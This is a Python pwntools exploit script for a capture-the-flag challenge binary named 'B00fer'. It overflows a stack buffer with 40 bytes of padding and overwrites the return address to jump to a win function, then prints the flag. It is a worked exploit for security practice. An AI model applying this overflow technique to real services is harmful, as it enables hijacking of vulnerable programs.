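#!/usr/bin/python3
"""ret2win-style exploit for the ``B00fer`` challenge binary (pwntools template).

pwntools reads switches from the command line via ``args``:

    ./exploit.py                 # run the local binary
    ./exploit.py GDB             # run locally under gdb with ``gdbscript``
    ./exploit.py REMOTE HOST PORT
    ./exploit.py SSH             # run the binary on a remote host over ssh
"""
import os
import sys

from pwn import *


# Allows you to switch between local/GDB/remote from terminal
def start(argv=None, *a, **kw):
    """Launch the target and return a pwntools tube.

    ``argv`` is an optional list of extra program arguments (copied, so
    the default is not a shared mutable list).  Remaining positional and
    keyword arguments are forwarded to the tube constructor.
    """
    argv = list(argv) if argv else []
    if args.GDB:
        # Use the module-level ``local_exe`` directly.  The original
        # assigned ``exe`` in sibling branches, which made ``exe`` a local
        # of this function and raised UnboundLocalError on this path.
        return gdb.debug([local_exe] + argv, gdbscript=gdbscript, *a, **kw)
    if args.REMOTE:
        # ('server', 'port') taken from the command line
        return remote(sys.argv[1], sys.argv[2], *a, **kw)
    if args.SSH:
        # Read credentials from the environment so they are not committed
        # alongside the exploit; the literals are placeholder fallbacks only.
        s = ssh(host=os.environ.get('SSH_HOST', 'HOST'),
                user=os.environ.get('SSH_USER', 'LOGIN'),
                password=os.environ.get('SSH_PASSWORD', 'PASSWORD'),
                port=int(os.environ.get('SSH_PORT', '0')))
        return s.process([remote_exe] + argv)
    # Run locally
    return process([local_exe] + argv, *a, **kw)


# Specify your GDB script here for debugging
gdbscript = '''
'''.format(**locals())

# Set up pwntools for the correct architecture
local_exe = 'B00fer'
remote_exe = 'REMOTE'
# This will automatically get context arch, bits, os etc
elf = context.binary = ELF(local_exe, checksec=False)

# Change logging level to help with debugging (error/warning/info/debug)
#context.log_level = 'debug'
context.log_level = 'error'

# ===========================================================
# EXPLOIT GOES HERE
# ===========================================================
# 40 bytes (5*8) of padding reach the saved return address, which is then
# overwritten with 0x401227 -- a fixed address, so this assumes the binary
# is not PIE.  If the target crashes on an SSE instruction (16-byte stack
# misalignment), insert a `ret` gadget before RET_ADDR -- TODO confirm
# against the binary.
PADDING = 5 * 8
RET_ADDR = 0x401227

payload = flat(
    b'\x00' * PADDING,
    p64(RET_ADDR),
)
# Keep a copy on disk for manual testing (e.g. `./B00fer < payload`)
write("payload", payload)

io = start()
io.sendlineafter(b'Hi there NICC! This program is 100% and there is NO WAY you are getting our flag.\n', payload)
io.recvline()  # discard the line preceding the flag; no decode needed for a dropped value
print(io.recvline().decode())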